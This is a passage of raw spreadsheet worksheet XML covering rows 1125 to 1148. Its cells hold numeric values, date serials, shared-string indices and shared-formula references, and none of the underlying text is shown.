      </c>
      <c r="P1125" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1125" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1125" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1125" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" s="1">
        <v>15660.0</v>
      </c>
      <c r="B1126" s="2" t="s">
        <v>4854</v>
      </c>
      <c r="C1126" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1126" s="2" t="s">
        <v>4855</v>
      </c>
      <c r="E1126" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="F1126" s="1" t="s">
        <v>4856</v>
      </c>
      <c r="G1126" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1126" s="4">
        <v>44659.22430555556</v>
      </c>
      <c r="I1126" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1126" s="1" t="s">
        <v>4857</v>
      </c>
      <c r="K1126" s="2" t="s">
        <v>4858</v>
      </c>
      <c r="L1126" s="1">
        <v>2.0</v>
      </c>
      <c r="M1126" s="1">
        <v>2.0</v>
      </c>
      <c r="N1126" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1126" s="1" t="s">
        <v>4859</v>
      </c>
      <c r="P1126" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1126" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1126" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1126" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="1">
        <v>15662.0</v>
      </c>
      <c r="B1127" s="2" t="s">
        <v>4860</v>
      </c>
      <c r="C1127" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1127" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1127" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1127" s="1" t="s">
        <v>4861</v>
      </c>
      <c r="G1127" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1127" s="1" t="s">
        <v>4862</v>
      </c>
      <c r="I1127" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1127" s="1" t="s">
        <v>4863</v>
      </c>
      <c r="K1127" s="2" t="s">
        <v>4864</v>
      </c>
      <c r="L1127" s="1">
        <v>1.0</v>
      </c>
      <c r="M1127" s="1">
        <v>1.0</v>
      </c>
      <c r="N1127" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1127" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1127" s="1" t="s">
        <v>2621</v>
      </c>
      <c r="Q1127" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1127" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1127" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="1">
        <v>15672.0</v>
      </c>
      <c r="B1128" s="2" t="s">
        <v>4865</v>
      </c>
      <c r="C1128" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1128" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1128" s="2" t="s">
        <v>2110</v>
      </c>
      <c r="F1128" s="1" t="s">
        <v>980</v>
      </c>
      <c r="G1128" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1128" s="1" t="s">
        <v>4866</v>
      </c>
      <c r="I1128" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1128" s="1" t="s">
        <v>4867</v>
      </c>
      <c r="K1128" s="2" t="s">
        <v>4868</v>
      </c>
      <c r="L1128" s="1">
        <v>2.0</v>
      </c>
      <c r="M1128" s="1">
        <v>2.0</v>
      </c>
      <c r="N1128" s="1" t="s">
        <v>977</v>
      </c>
      <c r="O1128" s="1" t="s">
        <v>977</v>
      </c>
      <c r="P1128" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1128" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1128" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1128" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="1">
        <v>15675.0</v>
      </c>
      <c r="B1129" s="2" t="s">
        <v>4869</v>
      </c>
      <c r="C1129" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1129" s="2" t="s">
        <v>4870</v>
      </c>
      <c r="E1129" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1129" s="1" t="s">
        <v>4871</v>
      </c>
      <c r="G1129" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1129" s="1" t="s">
        <v>4872</v>
      </c>
      <c r="I1129" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1129" s="1" t="s">
        <v>4873</v>
      </c>
      <c r="K1129" s="2" t="s">
        <v>4874</v>
      </c>
      <c r="L1129" s="1">
        <v>3.0</v>
      </c>
      <c r="M1129" s="1">
        <v>4.0</v>
      </c>
      <c r="N1129" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O1129" s="1" t="s">
        <v>4875</v>
      </c>
      <c r="P1129" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1129" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1129" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1129" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="1">
        <v>15676.0</v>
      </c>
      <c r="B1130" s="2" t="s">
        <v>4876</v>
      </c>
      <c r="C1130" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1130" s="2" t="s">
        <v>4870</v>
      </c>
      <c r="E1130" s="2" t="s">
        <v>2411</v>
      </c>
      <c r="F1130" s="1" t="s">
        <v>4877</v>
      </c>
      <c r="G1130" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1130" s="1" t="s">
        <v>4878</v>
      </c>
      <c r="I1130" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1130" s="1" t="s">
        <v>4873</v>
      </c>
      <c r="K1130" s="2" t="s">
        <v>4874</v>
      </c>
      <c r="L1130" s="1">
        <v>3.0</v>
      </c>
      <c r="M1130" s="1">
        <v>4.0</v>
      </c>
      <c r="N1130" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O1130" s="1" t="s">
        <v>4875</v>
      </c>
      <c r="P1130" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1130" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1130" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1130" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="1">
        <v>15678.0</v>
      </c>
      <c r="B1131" s="2" t="s">
        <v>4879</v>
      </c>
      <c r="C1131" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1131" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1131" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F1131" s="1" t="s">
        <v>4880</v>
      </c>
      <c r="G1131" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1131" s="4">
        <v>43623.52777777778</v>
      </c>
      <c r="I1131" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1131" s="1" t="s">
        <v>4881</v>
      </c>
      <c r="K1131" s="2" t="s">
        <v>4882</v>
      </c>
      <c r="L1131" s="1">
        <v>5.0</v>
      </c>
      <c r="M1131" s="1">
        <v>7.0</v>
      </c>
      <c r="N1131" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1131" s="1" t="s">
        <v>4883</v>
      </c>
      <c r="P1131" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1131" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1131" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1131" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="1">
        <v>15685.0</v>
      </c>
      <c r="B1132" s="2" t="s">
        <v>4884</v>
      </c>
      <c r="C1132" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1132" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1132" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F1132" s="1" t="s">
        <v>4880</v>
      </c>
      <c r="G1132" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1132" s="1" t="s">
        <v>4885</v>
      </c>
      <c r="I1132" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1132" s="1" t="s">
        <v>4886</v>
      </c>
      <c r="K1132" s="2" t="s">
        <v>4887</v>
      </c>
      <c r="L1132" s="1">
        <v>2.0</v>
      </c>
      <c r="M1132" s="1">
        <v>3.0</v>
      </c>
      <c r="N1132" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1132" s="1" t="s">
        <v>2006</v>
      </c>
      <c r="P1132" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1132" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1132" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1132" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="1">
        <v>15688.0</v>
      </c>
      <c r="B1133" s="2" t="s">
        <v>4888</v>
      </c>
      <c r="C1133" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1133" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1133" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F1133" s="1" t="s">
        <v>52</v>
      </c>
      <c r="G1133" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1133" s="4">
        <v>44751.82986111111</v>
      </c>
      <c r="I1133" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1133" s="1" t="s">
        <v>4889</v>
      </c>
      <c r="K1133" s="2" t="s">
        <v>4890</v>
      </c>
      <c r="L1133" s="1">
        <v>1.0</v>
      </c>
      <c r="M1133" s="1">
        <v>1.0</v>
      </c>
      <c r="N1133" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1133" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1133" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1133" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1133" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1133" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="1">
        <v>15689.0</v>
      </c>
      <c r="B1134" s="2" t="s">
        <v>4891</v>
      </c>
      <c r="C1134" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1134" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1134" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F1134" s="1" t="s">
        <v>4808</v>
      </c>
      <c r="G1134" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1134" s="4">
        <v>44782.58611111111</v>
      </c>
      <c r="I1134" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1134" s="1" t="s">
        <v>4892</v>
      </c>
      <c r="K1134" s="2" t="s">
        <v>4893</v>
      </c>
      <c r="L1134" s="1">
        <v>3.0</v>
      </c>
      <c r="M1134" s="1">
        <v>3.0</v>
      </c>
      <c r="N1134" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1134" s="1" t="s">
        <v>4894</v>
      </c>
      <c r="P1134" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1134" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1134" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1134" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="1">
        <v>15692.0</v>
      </c>
      <c r="B1135" s="2" t="s">
        <v>4895</v>
      </c>
      <c r="C1135" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1135" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1135" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F1135" s="1" t="s">
        <v>4896</v>
      </c>
      <c r="G1135" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1135" s="1" t="s">
        <v>4897</v>
      </c>
      <c r="I1135" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1135" s="1" t="s">
        <v>4898</v>
      </c>
      <c r="K1135" s="2" t="s">
        <v>4899</v>
      </c>
      <c r="L1135" s="1">
        <v>2.0</v>
      </c>
      <c r="M1135" s="1">
        <v>2.0</v>
      </c>
      <c r="N1135" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1135" s="1" t="s">
        <v>4900</v>
      </c>
      <c r="P1135" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1135" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1135" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1135" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="1">
        <v>15701.0</v>
      </c>
      <c r="B1136" s="2" t="s">
        <v>4901</v>
      </c>
      <c r="C1136" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1136" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="E1136" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="F1136" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1136" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1136" s="1" t="s">
        <v>4902</v>
      </c>
      <c r="I1136" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1136" s="1" t="s">
        <v>4903</v>
      </c>
      <c r="K1136" s="2" t="s">
        <v>4904</v>
      </c>
      <c r="L1136" s="1">
        <v>1.0</v>
      </c>
      <c r="M1136" s="1">
        <v>1.0</v>
      </c>
      <c r="N1136" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1136" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1136" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1136" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1136" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1136" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="1">
        <v>15703.0</v>
      </c>
      <c r="B1137" s="2" t="s">
        <v>3874</v>
      </c>
      <c r="C1137" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1137" s="2" t="s">
        <v>4905</v>
      </c>
      <c r="E1137" s="2" t="s">
        <v>4906</v>
      </c>
      <c r="F1137" s="1" t="s">
        <v>3876</v>
      </c>
      <c r="G1137" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1137" s="1" t="s">
        <v>4907</v>
      </c>
      <c r="I1137" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1137" s="1" t="s">
        <v>4908</v>
      </c>
      <c r="K1137" s="2" t="s">
        <v>4909</v>
      </c>
      <c r="L1137" s="1">
        <v>1.0</v>
      </c>
      <c r="M1137" s="1">
        <v>1.0</v>
      </c>
      <c r="N1137" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1137" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1137" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q1137" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1137" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S1137" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="1">
        <v>15723.0</v>
      </c>
      <c r="B1138" s="2" t="s">
        <v>4910</v>
      </c>
      <c r="C1138" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1138" s="2" t="s">
        <v>4911</v>
      </c>
      <c r="E1138" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F1138" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G1138" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1138" s="1" t="s">
        <v>4912</v>
      </c>
      <c r="I1138" s="1" t="s">
        <v>4913</v>
      </c>
      <c r="J1138" s="1" t="s">
        <v>4914</v>
      </c>
      <c r="K1138" s="2" t="s">
        <v>4915</v>
      </c>
      <c r="L1138" s="1">
        <v>13.0</v>
      </c>
      <c r="M1138" s="1">
        <v>34.0</v>
      </c>
      <c r="N1138" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O1138" s="1" t="s">
        <v>4916</v>
      </c>
      <c r="P1138" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1138" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1138" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1138" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="1">
        <v>15984.0</v>
      </c>
      <c r="B1139" s="2" t="s">
        <v>4917</v>
      </c>
      <c r="C1139" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1139" s="2" t="s">
        <v>4918</v>
      </c>
      <c r="E1139" s="8" t="s">
        <v>4919</v>
      </c>
      <c r="F1139" s="1" t="s">
        <v>3347</v>
      </c>
      <c r="G1139" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1139" s="1" t="s">
        <v>4920</v>
      </c>
      <c r="I1139" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1139" s="1" t="s">
        <v>4921</v>
      </c>
      <c r="K1139" s="2" t="s">
        <v>4922</v>
      </c>
      <c r="L1139" s="1">
        <v>1.0</v>
      </c>
      <c r="M1139" s="1">
        <v>1.0</v>
      </c>
      <c r="N1139" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1139" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1139" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1139" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1139" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1139" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="1">
        <v>15985.0</v>
      </c>
      <c r="B1140" s="2" t="s">
        <v>4917</v>
      </c>
      <c r="C1140" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1140" s="2" t="s">
        <v>4918</v>
      </c>
      <c r="E1140" s="8" t="s">
        <v>4919</v>
      </c>
      <c r="F1140" s="1" t="s">
        <v>3347</v>
      </c>
      <c r="G1140" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1140" s="1" t="s">
        <v>4923</v>
      </c>
      <c r="I1140" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J1140" s="1" t="s">
        <v>4924</v>
      </c>
      <c r="K1140" s="2" t="s">
        <v>4922</v>
      </c>
      <c r="L1140" s="1">
        <v>1.0</v>
      </c>
      <c r="M1140" s="1">
        <v>1.0</v>
      </c>
      <c r="N1140" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1140" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1140" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1140" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1140" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1140" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="1">
        <v>15986.0</v>
      </c>
      <c r="B1141" s="2" t="s">
        <v>4925</v>
      </c>
      <c r="C1141" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1141" s="2" t="s">
        <v>4926</v>
      </c>
      <c r="E1141" s="8" t="s">
        <v>4927</v>
      </c>
      <c r="F1141" s="1" t="s">
        <v>3347</v>
      </c>
      <c r="G1141" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1141" s="1" t="s">
        <v>4928</v>
      </c>
      <c r="I1141" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1141" s="1" t="s">
        <v>4929</v>
      </c>
      <c r="K1141" s="2" t="s">
        <v>4922</v>
      </c>
      <c r="L1141" s="1">
        <v>1.0</v>
      </c>
      <c r="M1141" s="1">
        <v>2.0</v>
      </c>
      <c r="N1141" s="1" t="s">
        <v>4930</v>
      </c>
      <c r="O1141" s="1" t="s">
        <v>4930</v>
      </c>
      <c r="P1141" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1141" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1141" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1141" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="1">
        <v>15987.0</v>
      </c>
      <c r="B1142" s="2" t="s">
        <v>4931</v>
      </c>
      <c r="C1142" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1142" s="2" t="s">
        <v>4932</v>
      </c>
      <c r="E1142" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1142" s="1" t="s">
        <v>4933</v>
      </c>
      <c r="G1142" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1142" s="1" t="s">
        <v>4934</v>
      </c>
      <c r="I1142" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1142" s="1" t="s">
        <v>4935</v>
      </c>
      <c r="K1142" s="2" t="s">
        <v>4936</v>
      </c>
      <c r="L1142" s="1">
        <v>5.0</v>
      </c>
      <c r="M1142" s="1">
        <v>7.0</v>
      </c>
      <c r="N1142" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1142" s="1" t="s">
        <v>4937</v>
      </c>
      <c r="P1142" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1142" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1142" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1142" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="1">
        <v>15991.0</v>
      </c>
      <c r="B1143" s="2" t="s">
        <v>4938</v>
      </c>
      <c r="C1143" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1143" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1143" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1143" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1143" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1143" s="1" t="s">
        <v>4940</v>
      </c>
      <c r="I1143" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1143" s="1" t="s">
        <v>4935</v>
      </c>
      <c r="K1143" s="2" t="s">
        <v>4936</v>
      </c>
      <c r="L1143" s="1">
        <v>5.0</v>
      </c>
      <c r="M1143" s="1">
        <v>7.0</v>
      </c>
      <c r="N1143" s="1" t="s">
        <v>4941</v>
      </c>
      <c r="O1143" s="1" t="s">
        <v>4937</v>
      </c>
      <c r="P1143" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1143" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1143" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1143" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="1">
        <v>16025.0</v>
      </c>
      <c r="B1144" s="2" t="s">
        <v>4942</v>
      </c>
      <c r="C1144" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1144" s="2" t="s">
        <v>4943</v>
      </c>
      <c r="E1144" s="2" t="s">
        <v>940</v>
      </c>
      <c r="F1144" s="1" t="s">
        <v>4944</v>
      </c>
      <c r="G1144" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1144" s="4">
        <v>43957.12430555555</v>
      </c>
      <c r="I1144" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1144" s="1" t="s">
        <v>4945</v>
      </c>
      <c r="K1144" s="2" t="s">
        <v>4946</v>
      </c>
      <c r="L1144" s="1">
        <v>2.0</v>
      </c>
      <c r="M1144" s="1">
        <v>4.0</v>
      </c>
      <c r="N1144" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1144" s="1" t="s">
        <v>4947</v>
      </c>
      <c r="P1144" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1144" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1144" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1144" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="1">
        <v>16044.0</v>
      </c>
      <c r="B1145" s="2" t="s">
        <v>4948</v>
      </c>
      <c r="C1145" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1145" s="2" t="s">
        <v>4949</v>
      </c>
      <c r="E1145" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1145" s="1" t="s">
        <v>4950</v>
      </c>
      <c r="G1145" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1145" s="1" t="s">
        <v>4951</v>
      </c>
      <c r="I1145" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1145" s="1" t="s">
        <v>4952</v>
      </c>
      <c r="K1145" s="2" t="s">
        <v>4953</v>
      </c>
      <c r="L1145" s="1">
        <v>11.0</v>
      </c>
      <c r="M1145" s="1">
        <v>18.0</v>
      </c>
      <c r="N1145" s="1" t="s">
        <v>2802</v>
      </c>
      <c r="O1145" s="1" t="s">
        <v>4954</v>
      </c>
      <c r="P1145" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1145" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1145" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1145" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="1">
        <v>16058.0</v>
      </c>
      <c r="B1146" s="2" t="s">
        <v>4955</v>
      </c>
      <c r="C1146" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1146" s="2" t="s">
        <v>4956</v>
      </c>
      <c r="E1146" s="8" t="s">
        <v>1001</v>
      </c>
      <c r="F1146" s="1" t="s">
        <v>4957</v>
      </c>
      <c r="G1146" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1146" s="5">
        <v>44479.32638888889</v>
      </c>
      <c r="I1146" s="1" t="s">
        <v>545</v>
      </c>
      <c r="J1146" s="1" t="s">
        <v>4958</v>
      </c>
      <c r="K1146" s="2" t="s">
        <v>4959</v>
      </c>
      <c r="L1146" s="1">
        <v>1.0</v>
      </c>
      <c r="M1146" s="1">
        <v>1.0</v>
      </c>
      <c r="N1146" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1146" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1146" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1146" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1146" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1146" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="1">
        <v>16059.0</v>
      </c>
      <c r="B1147" s="2" t="s">
        <v>4960</v>
      </c>
      <c r="C1147" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1147" s="2" t="s">
        <v>4961</v>
      </c>
      <c r="E1147" s="2" t="s">
        <v>4962</v>
      </c>
      <c r="F1147" s="1" t="s">
        <v>4706</v>
      </c>
      <c r="G1147" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1147" s="4">
        <v>44419.92361111111</v>
      </c>
      <c r="I1147" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1147" s="1" t="s">
        <v>4963</v>
      </c>
      <c r="K1147" s="2" t="s">
        <v>4964</v>
      </c>
      <c r="L1147" s="1">
        <v>3.0</v>
      </c>
      <c r="M1147" s="1">
        <v>3.0</v>
      </c>
      <c r="N1147" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1147" s="1" t="s">
        <v>4965</v>
      </c>
      <c r="P1147" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1147" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1147" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1147" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="1">
        <v>16076.0</v>
      </c>
      <c r="B1148" s="2" t="s">
        <v>4966</v>
      </c>
      <c r="C1148" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1148" s="2" t="s">
        <v>4967</v>
      </c>
      <c r="E1148" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1148" s="1" t="s">
        <v>4968</v>
      </c>
      <c r="G1148" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1148" s="1" t="s">
        <v>4969</v>
      </c>
      <c r="I1148" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1148" s="1" t="s">
